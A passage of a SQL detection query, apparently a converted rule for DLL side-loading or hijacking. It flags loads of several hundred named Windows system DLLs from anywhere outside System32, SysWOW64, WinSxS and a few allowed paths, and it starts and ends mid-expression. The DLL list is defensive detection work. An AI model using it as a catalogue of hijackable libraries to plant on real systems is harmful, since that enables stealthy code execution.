LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((Image LIKE 